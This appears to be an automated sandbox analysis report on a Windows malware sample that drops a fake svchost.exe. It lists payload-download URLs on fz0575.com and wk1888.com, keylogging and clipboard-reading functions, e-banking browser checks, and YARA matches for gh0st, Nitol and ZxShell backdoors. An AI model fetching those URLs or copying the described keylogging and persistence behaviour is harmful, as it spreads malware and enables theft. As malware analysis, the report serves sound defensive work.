Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exe-
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exeNoP
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exelo~
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exepoj
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exew
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com/
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exe
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.wk1888.com:2011/1.exetlV
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGY
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2682490023.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033BKSLMEM
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033FYMLMEM
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: .exe, 00000005.00000002.2682490023.000000000071F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3ez

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Windows\Temp\server.exe	Code function: <BackSpace>	3_2_10009A00
Source: C:\Windows\Temp\server.exe	Code function: <Enter>	3_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: <BackSpace>	8_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: <Enter>	8_2_10009A00

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404EB9

Contains functionality to modify clipboard data

Source: C:\Windows\Temp\server.exe	Code function: 3_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,		3_2_1000FA20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,		8_2_1000FA20

Contains functionality to read the clipboard data

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000FA90 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z,

3_2_1000FA90

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10009A00 GetKeyState,Sleep,lstrlen,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcat,lstrlen,lstrcat,lstrcat,

3_2_10009A00

Potential key logger detected (key state polling based)

Source: C:\Windows\Temp\ .exe

Code function: 5_2_00457B94 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

5_2_00457B94

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\Temp\server.exe	Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command		3_2_1000A6B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command		8_2_1000A6B0

Too many similar processes found

Source: cmd.exe

Process created: 65

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/

Contains functionality to call native functions

Source: C:\Windows\Temp\server.exe	Code function: 3_2_10002800 NtdllDefWindowProc_A,		3_2_10002800
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10002800 NtdllDefWindowProc_A,		8_2_10002800

Contains functionality to communicate with device drivers

Source: C:\Windows\Temp\ .exe

Code function: 5_2_0042E150: DeviceIoControl,

5_2_0042E150

Contains functionality to delete services

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040351A OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,

2_2_0040351A

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	0_2_004030CB
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10012010 ExitWindowsEx,	3_2_10012010
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,	3_2_1000B0F0
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043A500
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043AD30
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10012010 ExitWindowsEx,	8_2_10012010
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,	8_2_1000B0F0

Creates files inside the system directory

Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\kk	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\tt	Jump to behavior
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\bb	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_004046CA	0_2_004046CA
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405FA8	0_2_00405FA8
Source: C:\Windows\Temp\v5.exe	Code function: 2_2_00407470	2_2_00407470
Source: C:\Windows\Temp\server.exe	Code function: 3_2_004023C9	3_2_004023C9
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037810	3_2_10037810
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10052816	3_2_10052816
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1005401A	3_2_1005401A
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10044020	3_2_10044020
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10051029	3_2_10051029
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10043030	3_2_10043030
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037040	3_2_10037040
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041850	3_2_10041850
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002F060	3_2_1002F060
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D080	3_2_1001D080
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10036080	3_2_10036080
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C090	3_2_1002C090
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10045090	3_2_10045090
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C8A0	3_2_1002C8A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002F8B0	3_2_1002F8B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100380B0	3_2_100380B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100348C0	3_2_100348C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100388C0	3_2_100388C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003F0C0	3_2_1003F0C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100678C0	3_2_100678C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100350E0	3_2_100350E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100398F0	3_2_100398F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100518F1	3_2_100518F1
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035900	3_2_10035900
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040940	3_2_10040940
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042170	3_2_10042170
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001C990	3_2_1001C990
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002E9A0	3_2_1002E9A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100321B0	3_2_100321B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100369B0	3_2_100369B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100229C0	3_2_100229C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100289C0	3_2_100289C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004C1D0	3_2_1004C1D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100579D0	3_2_100579D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10030200	3_2_10030200
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034200	3_2_10034200
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042A00	3_2_10042A00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041220	3_2_10041220
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10017A30	3_2_10017A30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003CA30	3_2_1003CA30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10043A30	3_2_10043A30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10031A40	3_2_10031A40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001DA50	3_2_1001DA50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040A50	3_2_10040A50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10018A70	3_2_10018A70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10014A70	3_2_10014A70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003EA80	3_2_1003EA80
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10054ABB	3_2_10054ABB
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100312D0	3_2_100312D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003A2D0	3_2_1003A2D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002E2E0	3_2_1002E2E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10032AE0	3_2_10032AE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001E2F0	3_2_1001E2F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100682F0	3_2_100682F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037B10	3_2_10037B10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003C310	3_2_1003C310
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003BB20	3_2_1003BB20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004A320	3_2_1004A320
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041B20	3_2_10041B20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10030B40	3_2_10030B40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004F34F	3_2_1004F34F
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C350	3_2_1002C350
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10017360	3_2_10017360
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038360	3_2_10038360
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D370	3_2_1001D370
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003D390	3_2_1003D390
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001ABA0	3_2_1001ABA0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100393A0	3_2_100393A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100563A0	3_2_100563A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004FBC5	3_2_1004FBC5
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004B3C0	3_2_1004B3C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100233F0	3_2_100233F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003DBF0	3_2_1003DBF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100413F0	3_2_100413F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10053418	3_2_10053418
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1005141B	3_2_1005141B
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042420	3_2_10042420
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001543E	3_2_1001543E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040C40	3_2_10040C40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034C70	3_2_10034C70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001C480	3_2_1001C480
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001ACA0	3_2_1001ACA0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100364B0	3_2_100364B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002DCC0	3_2_1002DCC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035CC0	3_2_10035CC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100554E0	3_2_100554E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100334F0	3_2_100334F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100544FD	3_2_100544FD
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003AD00	3_2_1003AD00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10015D10	3_2_10015D10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001CD20	3_2_1001CD20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035540	3_2_10035540
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003FD40	3_2_1003FD40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034560	3_2_10034560
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C570	3_2_1002C570
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10051DC7	3_2_10051DC7
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003CDC0	3_2_1003CDC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100415C0	3_2_100415C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100145D0	3_2_100145D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004A5D0	3_2_1004A5D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10016DE0	3_2_10016DE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10039DE0	3_2_10039DE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004CDE0	3_2_1004CDE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100505F7	3_2_100505F7
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041DF0	3_2_10041DF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040E00	3_2_10040E00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037E10	3_2_10037E10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038610	3_2_10038610
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001DE40	3_2_1001DE40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D650	3_2_1001D650
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038E50	3_2_10038E50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10022E60	3_2_10022E60
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10064E70	3_2_10064E70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001568D	3_2_1001568D
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003B690	3_2_1003B690
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003C6A0	3_2_1003C6A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100656D0	3_2_100656D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10066EE0	3_2_10066EE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10033EF0	3_2_10033EF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003F700	3_2_1003F700
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10057F20	3_2_10057F20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10013730	3_2_10013730
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10063F30	3_2_10063F30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10063760	3_2_10063760
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10046F90	3_2_10046F90
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040FC0	3_2_10040FC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001BFD0	3_2_1001BFD0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003A7D0	3_2_1003A7D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100287F0	3_2_100287F0
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_00407470	4_2_00407470
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00433020	5_2_00433020
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00458C58	5_2_00458C58
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00452655	5_2_00452655
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447B9C	5_2_00447B9C
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044DDAB	5_2_0044DDAB
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00443ED8	5_2_00443ED8
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_004023C9	8_2_004023C9
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037810	8_2_10037810
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10052816	8_2_10052816
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1005401A	8_2_1005401A
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10044020	8_2_10044020
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10051029	8_2_10051029
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10043030	8_2_10043030
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037040	8_2_10037040
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041850	8_2_10041850
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002F060	8_2_1002F060
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D080	8_2_1001D080
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10036080	8_2_10036080
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C090	8_2_1002C090
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10045090	8_2_10045090
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C8A0	8_2_1002C8A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002F8B0	8_2_1002F8B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100380B0	8_2_100380B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100348C0	8_2_100348C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100388C0	8_2_100388C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003F0C0	8_2_1003F0C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100678C0	8_2_100678C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100350E0	8_2_100350E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100398F0	8_2_100398F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100518F1	8_2_100518F1
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035900	8_2_10035900
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040940	8_2_10040940
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042170	8_2_10042170
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001C990	8_2_1001C990
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002E9A0	8_2_1002E9A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100321B0	8_2_100321B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100369B0	8_2_100369B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100229C0	8_2_100229C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100289C0	8_2_100289C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004C1D0	8_2_1004C1D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100579D0	8_2_100579D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10030200	8_2_10030200
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034200	8_2_10034200
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042A00	8_2_10042A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041220	8_2_10041220
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10017A30	8_2_10017A30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003CA30	8_2_1003CA30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10043A30	8_2_10043A30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10031A40	8_2_10031A40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001DA50	8_2_1001DA50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040A50	8_2_10040A50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10018A70	8_2_10018A70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10014A70	8_2_10014A70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003EA80	8_2_1003EA80
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10054ABB	8_2_10054ABB
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100312D0	8_2_100312D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003A2D0	8_2_1003A2D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002E2E0	8_2_1002E2E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10032AE0	8_2_10032AE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001E2F0	8_2_1001E2F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100682F0	8_2_100682F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037B10	8_2_10037B10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003C310	8_2_1003C310
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003BB20	8_2_1003BB20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004A320	8_2_1004A320
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041B20	8_2_10041B20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10030B40	8_2_10030B40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004F34F	8_2_1004F34F
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C350	8_2_1002C350
